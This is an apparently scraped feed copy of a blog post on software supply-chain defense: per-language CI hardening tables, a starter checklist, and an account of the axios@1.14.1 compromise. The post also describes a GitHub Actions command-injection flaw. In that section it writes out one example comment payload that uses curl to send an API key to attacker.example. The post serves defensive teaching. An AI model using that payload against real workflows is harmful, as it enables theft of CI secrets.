&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;4. Lifecycle script gate&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;onlyBuiltDependencies&lt;/code&gt; + &lt;code&gt;--ignore-scripts&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pip install --only-binary=:all:&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;audit &lt;code&gt;&amp;lt;build&amp;gt;&amp;lt;plugins&amp;gt;&lt;/code&gt; + checksum-pin them&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cgo&lt;/code&gt; / &lt;code&gt;//go:generate&lt;/code&gt; controlled via Bazel/Nix sandbox&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;build.rs&lt;/code&gt; sandboxed via Bazel &lt;code&gt;rules_rust&lt;/code&gt; or &lt;code&gt;cargo-deny&lt;/code&gt; bans&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;bundle config force_ruby_platform true&lt;/code&gt; to skip native; or sandbox&lt;/td&gt;
&lt;td&gt;PackageReference (modern) doesn't run scripts; audit any &lt;code&gt;packages.config&lt;/code&gt; projects&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;5. Base image digest pin&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;FROM image:tag@sha256:...&lt;/code&gt; (any Dockerfile, any language)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;6. Image signing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;cosign + Sigstore (any registry, any image)&lt;/td&gt;
&lt;td&gt;same; PEP 740 attestations + &lt;code&gt;sigstore&lt;/code&gt; for wheels&lt;/td&gt;
&lt;td&gt;same; &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; for JARs&lt;/td&gt;
&lt;td&gt;same; &lt;code&gt;slsa-github-generator/builder-go&lt;/code&gt; for SLSA&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cargo-dist&lt;/code&gt; + Sigstore&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;dotnet nuget sign&lt;/code&gt;; NuGet signature verification&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;7. CI mutable-ref pin&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;uses: org/action@&amp;lt;sha&amp;gt;&lt;/code&gt;; &lt;code&gt;pinact&lt;/code&gt; enforce&lt;/td&gt;
&lt;td&gt;(Python doesn't have an "Actions" concept; this is CI-platform, not language)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;8. Default-deny permissions&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;GHA &lt;code&gt;permissions: {}&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;(CI-platform; see CI table below)&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;td&gt;same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;11. Logger redaction&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;pino &lt;code&gt;redact:&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;structlog&lt;/code&gt; processors + &lt;code&gt;logging.Filter&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Logback &lt;code&gt;MaskingPatternLayout&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;zap&lt;/code&gt; custom encoder; &lt;code&gt;zerolog&lt;/code&gt; &lt;code&gt;.Strs("redacted", ...)&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;tracing&lt;/code&gt; &lt;code&gt;Layer&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Rails.config.filter_parameters&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Serilog &lt;code&gt;Enrichers.Sensitive&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;12. Force-pin transitive&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pnpm.overrides&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;pip &lt;code&gt;constraints.txt&lt;/code&gt;; uv &lt;code&gt;[tool.uv] override-dependencies&lt;/code&gt;; Poetry → promote to direct&lt;/td&gt;
&lt;td&gt;Maven &lt;code&gt;&amp;lt;dependencyManagement&amp;gt;&lt;/code&gt;; Gradle &lt;code&gt;dependencySubstitution&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;replace&lt;/code&gt; directive in &lt;code&gt;go.mod&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;[patch.crates-io]&lt;/code&gt; in &lt;code&gt;Cargo.toml&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Direct &lt;code&gt;gem 'foo', '1.2.3'&lt;/code&gt; in &lt;code&gt;Gemfile&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;Directory.Packages.props&lt;/code&gt; central management&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;CI translations for Boundaries 5–9:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;GitHub Actions&lt;/th&gt;
&lt;th&gt;GitLab CI&lt;/th&gt;
&lt;th&gt;Buildkite&lt;/th&gt;
&lt;th&gt;CircleCI&lt;/th&gt;
&lt;th&gt;Jenkins&lt;/th&gt;
&lt;th&gt;AWS CodeBuild&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Mutable-ref pin (B7)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;uses: org/action@&amp;lt;sha&amp;gt;&lt;/code&gt; + &lt;code&gt;pinact&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;include: ref: &amp;lt;sha&amp;gt;&lt;/code&gt; + Renovate &lt;code&gt;gitlabci-include&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Plugin &lt;code&gt;@&amp;lt;sha&amp;gt;&lt;/code&gt; + Renovate &lt;code&gt;buildkite&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Inline orbs; or pin &lt;code&gt;orbs: foo/bar@&amp;lt;exact-version&amp;gt;&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;@Library('foo@&amp;lt;sha&amp;gt;')&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pre-mirrored installers + checksum verify in &lt;code&gt;pre_build&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Default-deny perms (B8)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;permissions: {}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;id_tokens:&lt;/code&gt; per-job; protected variables&lt;/td&gt;
&lt;td&gt;Agent-queue ACLs; secrets via Vault Agent&lt;/td&gt;
&lt;td&gt;Restricted contexts&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;withCredentials&lt;/code&gt; per-step; folder-level isolation&lt;/td&gt;
&lt;td&gt;Per-project IAM role; &lt;code&gt;SECRETS_MANAGER&lt;/code&gt; vars&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;OIDC trust (B8)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;sub&lt;/code&gt;/&lt;code&gt;job_workflow_ref&lt;/code&gt; anchored&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;CI_JOB_JWT_V2&lt;/code&gt; audience-bound&lt;/td&gt;
&lt;td&gt;OIDC plugin since 2023&lt;/td&gt;
&lt;td&gt;&lt;code&gt;circleci/oidc-orb&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Workload identity / &lt;code&gt;manage-credentials-binding-plugin&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;aws sts assume-role-with-web-identity&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Shell injection (B9)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;actionlint&lt;/code&gt; + &lt;code&gt;zizmor&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;glab ci lint&lt;/code&gt;; &lt;code&gt;semgrep p/ci&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;code&gt;buildkite-pipeline-lint&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;circleci config validate&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Pipeline Linter; &lt;code&gt;pipeline-utility-steps&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cfn-lint&lt;/code&gt; + &lt;code&gt;checkov&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Image signing identity (B6)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;OIDC issuer &lt;code&gt;token.actions.githubusercontent.com&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;CI_JOB_JWT_V2&lt;/code&gt; issuer&lt;/td&gt;
&lt;td&gt;Buildkite OIDC issuer&lt;/td&gt;
&lt;td&gt;&lt;code&gt;oidc.circleci.com&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;OIDC via plugin or workload identity&lt;/td&gt;
&lt;td&gt;CodeBuild OIDC tokens&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Cross-cutting tools, alphabetical:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Audit (CVE in deps):&lt;/strong&gt; pnpm/npm &lt;code&gt;audit&lt;/code&gt; → &lt;code&gt;pip-audit&lt;/code&gt; (Python), &lt;code&gt;mvn dependency-check:check&lt;/code&gt; or Gradle &lt;code&gt;dependencyCheckAnalyze&lt;/code&gt; (Java), &lt;code&gt;govulncheck&lt;/code&gt; (Go, symbol-aware reachability), &lt;code&gt;cargo audit&lt;/code&gt; + &lt;code&gt;cargo-deny&lt;/code&gt; (Rust), &lt;code&gt;bundler-audit&lt;/code&gt; (Ruby), &lt;code&gt;dotnet list package --vulnerable --include-transitive&lt;/code&gt; (.NET). Cross-stack: &lt;strong&gt;OSV-Scanner&lt;/strong&gt; (Google; OSV format covers all of the above), Snyk Open Source, Wiz, Socket.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cosign:&lt;/strong&gt; ecosystem-agnostic. Works on any container image and on generic blobs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;gitleaks:&lt;/strong&gt; stack-agnostic. Alternatives: &lt;code&gt;trufflehog&lt;/code&gt;, &lt;code&gt;detect-secrets&lt;/code&gt;, GitHub native push protection. Run several; they catch different things.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CodeQL:&lt;/strong&gt; native multi-language (JS/TS, Python, Java, Kotlin, Go, Ruby, C#, C/C++, Swift). Alternatives: Semgrep Pro (broadest), Snyk Code, SonarCloud, Veracode.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;minimumReleaseAge&lt;/code&gt;:&lt;/strong&gt; native in pnpm. Universal via Renovate (&lt;code&gt;minimumReleaseAge&lt;/code&gt; config) covers npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SBOM:&lt;/strong&gt; &lt;code&gt;syft&lt;/code&gt; is stack-agnostic. Per-stack: &lt;code&gt;cyclonedx-bom&lt;/code&gt; (Python), &lt;code&gt;cyclonedx-maven-plugin&lt;/code&gt; (Java), &lt;code&gt;cyclonedx-gomod&lt;/code&gt; (Go), &lt;code&gt;cargo cyclonedx&lt;/code&gt; (Rust), &lt;code&gt;bundler-cyclonedx&lt;/code&gt; (Ruby), &lt;code&gt;dotnet CycloneDX&lt;/code&gt; (.NET). Consume with &lt;strong&gt;Dependency-Track&lt;/strong&gt;; scan with &lt;strong&gt;Trivy&lt;/strong&gt; or &lt;strong&gt;Grype&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The boundary survives. The YAML changes.&lt;/p&gt;




&lt;h2&gt;
  
  
  Closing
&lt;/h2&gt;

&lt;p&gt;Last week a colleague's PR went red on &lt;code&gt;pinact --check --verify&lt;/code&gt; because they'd added &lt;code&gt;actions/checkout@v6&lt;/code&gt; instead of the SHA. Thirty seconds of annoyance. Without that gate, that line would have been one tag-rewrite away from &lt;code&gt;tj-actions&lt;/code&gt;. Repeat across 110 &lt;code&gt;uses:&lt;/code&gt; lines, 16 workflows, 7 production Dockerfiles, and one &lt;code&gt;_.template&lt;/code&gt; CVE that turned out not to matter, and that's the week.&lt;/p&gt;

&lt;p&gt;The supply-chain attacker's leverage is asymmetric: one compromised maintainer, one rewritten tag, one unscanned dependency cascades into thousands of victims. The defender's leverage can be asymmetric too, but only if your controls live at the right boundary. SAST won't catch a malicious GitHub Action. A pen-test won't catch a tag rewrite. A bug bounty isn't going to surface an &lt;code&gt;_.template&lt;/code&gt; CVE buried four levels deep in a transitive dep nobody knew was there.&lt;/p&gt;

&lt;p&gt;The four-line diff at the top of this article wasn't found by SAST. It wasn't found by pen-test. It was found by a grep for &lt;code&gt;${{ github.event&lt;/code&gt; across every workflow in the monorepo, on a Tuesday, by someone who knew that string was the boundary between "code we wrote" and "code an attacker wrote for us."&lt;/p&gt;
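&lt;p&gt;That audit is reproducible in one line. A sketch (the demo file stands in for a real &lt;code&gt;.github/workflows/&lt;/code&gt; tree):&lt;/p&gt;

```shell
# Any hit is a spot where attacker-controlled event text reaches workflow YAML.
mkdir -p /tmp/wf
cat > /tmp/wf/review.yml <<'EOF'
      - run: |
          COMMENT_BODY="${{ github.event.comment.body }}"
EOF
grep -rn '${{ github.event' /tmp/wf
```

&lt;p&gt;Each hit then gets triaged: interpolated into &lt;code&gt;run:&lt;/code&gt; (injection) or passed through &lt;code&gt;env:&lt;/code&gt; (data).&lt;/p&gt;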

&lt;p&gt;That grep took eleven seconds. The fix took four lines. The control that catches the next one was one commit.&lt;/p&gt;

&lt;p&gt;If you only take three things from this: pin every external CI reference (Action / include / plugin / orb / shared-library) to a content-addressed identifier; scope every CI permission block to least privilege; set a &lt;code&gt;minimumReleaseAge&lt;/code&gt; of at least 3 days on your package manager. Put the first two as required status checks on &lt;code&gt;main&lt;/code&gt;. Together they would have stopped &lt;code&gt;axios@1.14.1&lt;/code&gt; cold for any pipeline running them, and tj-actions cold for every repo that ran it. The other nine boundaries are the layers behind that.&lt;/p&gt;

&lt;p&gt;For a regulated workload (healthcare staffing, where downtime maps to nurses missing shifts at hospitals, so we weight availability higher than most SaaS), the calibration looks like this: we tolerated +5 minutes of PR latency, but rejected anything that could block a hotfix at 2am. Your domain's calibration will differ. Write down why.&lt;/p&gt;

&lt;p&gt;If you've calibrated &lt;code&gt;minimumReleaseAge&lt;/code&gt; differently, I want to hear the number and why, especially if you're in fintech or healthcare with stricter patch SLAs. Tell me I'm wrong about any of the trade-offs in the comments. I'd rather argue about the number here than discover the right answer at 2am during a credential-rotation drill because some maintainer's npm token leaked at lunch.&lt;/p&gt;




&lt;h2&gt;
  
  
  Appendix: minimal viable starter pack
&lt;/h2&gt;

&lt;p&gt;A team that has none of these in place can ship a meaningful subset in roughly a week, regardless of stack:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Lock manifests committed; CI install command refuses to mutate them.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;minimumReleaseAge&lt;/code&gt; (pnpm) or Renovate equivalent set to ≥ 3 days.&lt;/li&gt;
&lt;li&gt;Lifecycle-script default-deny: &lt;code&gt;pnpm.onlyBuiltDependencies&lt;/code&gt; allowlist + &lt;code&gt;--ignore-scripts&lt;/code&gt; in CI; equivalent gate per stack.&lt;/li&gt;
&lt;li&gt;Base images pinned by &lt;code&gt;@sha256:&lt;/code&gt; digest. Non-root &lt;code&gt;USER&lt;/code&gt; in every production image.&lt;/li&gt;
&lt;li&gt;Workflow / pipeline default-deny on permissions; per-job grants.&lt;/li&gt;
&lt;li&gt;Mutable references (&lt;code&gt;uses:&lt;/code&gt;, &lt;code&gt;include:&lt;/code&gt;, plugins, orbs, shared libs) pinned to commit SHAs; CI gate fails un-pinned PRs.&lt;/li&gt;
&lt;li&gt;Untrusted CI input passed via env vars, never interpolated into shell.&lt;/li&gt;
&lt;li&gt;Image signing via cosign + Sigstore (or stack-equivalent provenance).&lt;/li&gt;
&lt;li&gt;PR-time secret scanning (gitleaks / trufflehog).&lt;/li&gt;
&lt;li&gt;PR-time dependency CVE gate (&lt;code&gt;pnpm audit&lt;/code&gt; + per-stack equivalents above) with documented expiry-forced allowlist.&lt;/li&gt;
&lt;li&gt;Logger redaction at framework level for auth headers, cookies, password / token / secret keys.&lt;/li&gt;
&lt;li&gt;CODEOWNERS covering every file in this list.&lt;/li&gt;
&lt;/ul&gt;
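&lt;p&gt;The two image items from the list combine into a few Dockerfile lines. A sketch (the digest is a placeholder; resolve the real one with &lt;code&gt;docker buildx imagetools inspect&lt;/code&gt;):&lt;/p&gt;

```dockerfile
# Digest pin: the tag is for humans, the sha256 is what the build trusts.
FROM node:22-alpine@sha256:<digest>

WORKDIR /app
COPY --chown=node:node . .

# Non-root by default; the official node images ship a "node" user.
USER node
CMD ["node", "dist/server.js"]
```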

&lt;p&gt;Each item is a few lines of configuration. Total cost is roughly the week described above for a multi-project monorepo; smaller repos proportionally less. The benefit, in our case, was being able to stop checking my phone on Sundays.&lt;/p&gt;

</description>
      <category>security</category>
      <category>devsecops</category>
      <category>githubactions</category>
      <category>supplychain</category>
    </item>
    <item>
      <title>Twelve Trust Boundaries: A Field Guide to Supply-Chain Defense After axios@1.14.1</title>
      <dc:creator>Ahmad Kanj</dc:creator>
      <pubDate>Fri, 08 May 2026 12:32:00 +0000</pubDate>
      <link>https://dev.to/aws-builders/twelve-trust-boundaries-a-field-guide-to-supply-chain-defense-after-1pna</link>
      <guid>https://dev.to/aws-builders/twelve-trust-boundaries-a-field-guide-to-supply-chain-defense-after-1pna</guid>
      <description>&lt;p&gt;On March 30, 2026, an attacker who had stolen an &lt;code&gt;axios&lt;/code&gt; maintainer's npm publish credentials pushed &lt;code&gt;axios@1.14.1&lt;/code&gt; to the registry. The version looked like a normal patch a single-digit bump from 1.14.0. It was live for roughly three hours before the maintainer rotated credentials and the version was unpublished.&lt;/p&gt;

&lt;p&gt;Three hours, on a Monday, during peak CI/CD hours across multiple time zones. Any team running &lt;code&gt;pnpm install&lt;/code&gt; or &lt;code&gt;npm install&lt;/code&gt; against a &lt;code&gt;^1.14.0&lt;/code&gt; constraint pulled &lt;code&gt;1.14.1&lt;/code&gt; automatically. (&lt;code&gt;^1.14.0&lt;/code&gt; means "any 1.x.y ≥ 1.14.0"; most package managers express the same idea: &lt;code&gt;~=&lt;/code&gt; in pip, &lt;code&gt;^&lt;/code&gt; in Cargo, &lt;code&gt;~&amp;gt;&lt;/code&gt; in Gemfile.) No CVE was published during the window. SAST tools had nothing to flag.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;axios@1.14.1&lt;/code&gt; added one new transitive dependency (a dependency-of-a-dependency, pulled in indirectly): &lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;. That package's &lt;code&gt;postinstall&lt;/code&gt; script (a hook the package manager runs automatically after install, the canonical Node footgun, with analogues in pip's &lt;code&gt;setup.py&lt;/code&gt; build hooks, Ruby's &lt;code&gt;gem extconf&lt;/code&gt;, and Cargo's &lt;code&gt;build.rs&lt;/code&gt;) ran &lt;code&gt;node setup.js&lt;/code&gt;, which downloaded a Python-based RAT (Remote Access Trojan) from a C2 (command-and-control) server, exfiltrated environment variables and cloud credentials, and attempted to establish persistence on the build host. The compromise wouldn't have been visible to anyone glancing at the lockfile diff: a new transitive in a stable utility, the kind of churn most teams approve without thinking.&lt;/p&gt;
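&lt;p&gt;The &lt;code&gt;postinstall&lt;/code&gt; vector is exactly what a lifecycle-script default-deny closes off. In recent pnpm versions, install scripts don't run unless the package is explicitly allowlisted; a sketch (package names illustrative):&lt;/p&gt;

```yaml
# pnpm-workspace.yaml: lifecycle scripts are default-deny;
# only these named packages may run build/postinstall hooks.
onlyBuiltDependencies:
  - esbuild
  - sharp
```

&lt;p&gt;Under a config like this, an unexpected transitive's &lt;code&gt;postinstall&lt;/code&gt; simply never executes.&lt;/p&gt;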

&lt;p&gt;Three hours is forever in CI. By the time npm pulled the version, the bytes had already shipped to thousands of build hosts.&lt;/p&gt;

&lt;p&gt;Two weeks before that incident, I was reading through a workflow in our own repo that lets engineers trigger an LLM code review by commenting &lt;code&gt;/review&lt;/code&gt; on a pull request. I stopped on this line:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .github/workflows/opencode-review.yml:108&lt;/span&gt;
&lt;span class="s"&gt;COMMENT_BODY="${{ github.event.comment.body || '' }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;if:&lt;/code&gt; block above it gated only on &lt;code&gt;startsWith(comment.body, '/review')&lt;/code&gt;. There was no &lt;code&gt;comment.author_association&lt;/code&gt; check. Anyone who could comment on a PR, including a drive-by commenter from a public fork, could trigger this workflow. The job loaded &lt;code&gt;OPENROUTER_API_KEY&lt;/code&gt; from AWS Secrets Manager and ran with &lt;code&gt;pull-requests: write&lt;/code&gt;, &lt;code&gt;issues: write&lt;/code&gt;, and AWS OIDC (OpenID Connect short-lived workload identity, used here instead of long-lived API keys) in scope.&lt;/p&gt;

&lt;p&gt;A comment body of &lt;code&gt;/review"; curl -X POST attacker.example/x -d "$OPENROUTER_API_KEY&lt;/code&gt; would have run on the next CI build. CWE-78: OS command injection, untrusted input concatenated into a shell command. Found, scoped, fixed in a four-line diff.&lt;/p&gt;
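&lt;p&gt;The shape of that fix, sketched (step names are assumptions, not our literal four-line diff): gate on the commenter's association, and pass the untrusted body through &lt;code&gt;env:&lt;/code&gt; so it reaches the shell as data instead of being interpolated into the script text.&lt;/p&gt;

```yaml
# Hypothetical sketch of the two changes.
if: |
  startsWith(github.event.comment.body, '/review') &&
  contains(fromJSON('["OWNER","MEMBER","COLLABORATOR"]'), github.event.comment.author_association)
steps:
  - name: Parse review command
    env:
      COMMENT_BODY: ${{ github.event.comment.body }}  # arrives as an env var, never shell-expanded
    run: |
      printf '%s\n' "$COMMENT_BODY" | head -n 1
```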

&lt;p&gt;Two attacks, very different mechanics. axios was a credential-theft → publish → postinstall chain at the registry boundary. The CWE-78 was a comment-string interpolation at the workflow boundary. The connection: in both cases the attacker didn't write code "in" the repo. They injected code by abusing a trust relationship: we trusted axios's npm releases; we trusted GitHub event input. The perimeter is no longer your application. It's everything that runs before, during, and after your build, and the defense has to live in those same places.&lt;/p&gt;

&lt;p&gt;I work on a multi-project monorepo (a single git repository hosting many services and libraries; JavaScript and TypeScript in our case, but the framework below maps to any monorepo or polyrepo, in any language). A month after &lt;code&gt;axios@1.14.1&lt;/code&gt; shipped, a Slack message landed in our channel: &lt;em&gt;"we have Wiz, SonarCloud, gitleaks, Renovate but are we good?"&lt;/em&gt; Seven days later I had a triaged P0/P1/P2 list: 12 P0s (auth, secrets, registry trust), 18 P1s (pinning, permissions, lifecycle), 17 P2s (logging, SBOM, hardening), and a branch with 48 files changed and +2,487 / −646 lines of supply-chain controls.&lt;/p&gt;

&lt;p&gt;What follows is the framework I use, the specific findings I hit, the trade-offs I made, and the equivalent control in your stack, whether your repo is npm, pip, Maven, Go modules, Cargo, or RubyGems, and whether your CI is GitHub Actions, GitLab, Buildkite, or Jenkins. The worked example here is pnpm and GitHub Actions because that's where I shipped it. The boundaries are stack-neutral.&lt;/p&gt;




&lt;h2&gt;
  
  
  Where the attack surface actually lives now
&lt;/h2&gt;

&lt;p&gt;Your application's attack surface is bounded. A handful of endpoints, an auth system, a database. You can audit it, pen-test it, threat-model it on a whiteboard in an afternoon.&lt;/p&gt;

&lt;p&gt;Your supply chain is not bounded. It's the transitive closure of every package you import, every CI Action / GitLab include / Buildkite plugin in every workflow, every base image &lt;code&gt;FROM&lt;/code&gt; line in every Dockerfile, every binary your CI runner downloads at build time, every preset, every fork, every "trusted" community helper.&lt;/p&gt;

&lt;p&gt;The math doesn't work in your favour. A typical mid-sized application resolves on the order of 1,000–3,000 transitive dependencies in its lockfile (the resolved-versions file your package manager writes: &lt;code&gt;package-lock.json&lt;/code&gt;, &lt;code&gt;Pipfile.lock&lt;/code&gt;, &lt;code&gt;Cargo.lock&lt;/code&gt;, &lt;code&gt;Gemfile.lock&lt;/code&gt;, &lt;code&gt;go.sum&lt;/code&gt;). A typical CI pipeline chains 10–30 third-party Actions / plugins. Across a multi-year horizon, the probability that none of those maintainers gets phished, gets social-engineered, or leaks a publish token approaches zero.&lt;/p&gt;
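&lt;p&gt;A back-of-envelope version of that claim (the rates here are illustrative assumptions, not measured data):&lt;/p&gt;

```shell
# Illustrative only: suppose each of 1,500 transitive maintainers has an
# independent 0.05% chance per year of a compromised publish credential.
# Chance that at least one is compromised over a 3-year horizon:
awk 'BEGIN { p = 0.0005; n = 1500; y = 3; printf "%.1f%%\n", (1 - (1 - p)^(n * y)) * 100 }'
# prints 89.5%
```

&lt;p&gt;Cut &lt;code&gt;p&lt;/code&gt; by an order of magnitude and the result is still uncomfortably far from zero.&lt;/p&gt;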

&lt;p&gt;Recent incidents to anchor frequency:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;2018: &lt;code&gt;event-stream&lt;/code&gt; (npm advisory 737):&lt;/strong&gt; maintainer handed the package to a malicious "helpful contributor" who added a payload in a sub-dependency. Targeted exfiltration of private keys from the Copay/&lt;code&gt;copay-dash&lt;/code&gt; Bitcoin wallet specifically; the payload was conditional, with no effect on other consumers.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2021: &lt;code&gt;ua-parser-js&lt;/code&gt;:&lt;/strong&gt; npm account takeover. Crypto miner and credential theft on every install. ~4 hours before takedown.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2021: &lt;code&gt;codecov&lt;/code&gt; bash uploader (CVE-2021-32699):&lt;/strong&gt; modified upload script harvested CI environment variables. HashiCorp, Twilio, Confluent affected.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2022: &lt;code&gt;node-ipc&lt;/code&gt; (CVE-2022-23812):&lt;/strong&gt; maintainer protestware. Wiped files on Russian and Belarusian IPs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2024: &lt;code&gt;xz-utils&lt;/code&gt; (CVE-2024-3094):&lt;/strong&gt; multi-year insider. The "Jia Tan" persona spent ~2 years building trust before merging an OpenSSH authentication backdoor via &lt;code&gt;liblzma&lt;/code&gt; linkage with a specific Ed448 key. Discovered by Postgres engineer Andres Freund investigating ~500 ms of &lt;code&gt;sshd&lt;/code&gt; login latency, before the affected versions reached most stable distributions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2024: &lt;code&gt;@solana/web3.js&lt;/code&gt; (GHSA-7493-mqf3-cv5g):&lt;/strong&gt; npm token compromise. Wallet drainer in published versions for ~5 hours.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: &lt;code&gt;tj-actions/changed-files&lt;/code&gt; (CVE-2025-30066):&lt;/strong&gt; chained through &lt;code&gt;reviewdog/action-setup&lt;/code&gt; (CVE-2025-30154) → stolen PAT → retroactive semver-tag rewrite. ~218 repos confirmed leaked secrets out of ~23,000 references per StepSecurity / Wiz post-incident telemetry.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: Shai-Hulud npm worm:&lt;/strong&gt; the first true self-replicating npm worm. A &lt;code&gt;postinstall&lt;/code&gt; harvested maintainer npm tokens and re-published the worm into every other package the victim maintained. ~180 packages compromised across multiple maintainer namespaces.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2025: Nx &lt;code&gt;s1ngularity&lt;/code&gt; worm:&lt;/strong&gt; npm postinstall on compromised Nx versions harvested GitHub PATs, SSH keys, and crypto wallets from build hosts; backdoored downstream &lt;code&gt;nx-init-&lt;/code&gt; repositories. Directly relevant to anyone on an Nx monorepo.&lt;/li&gt;
&lt;li&gt;
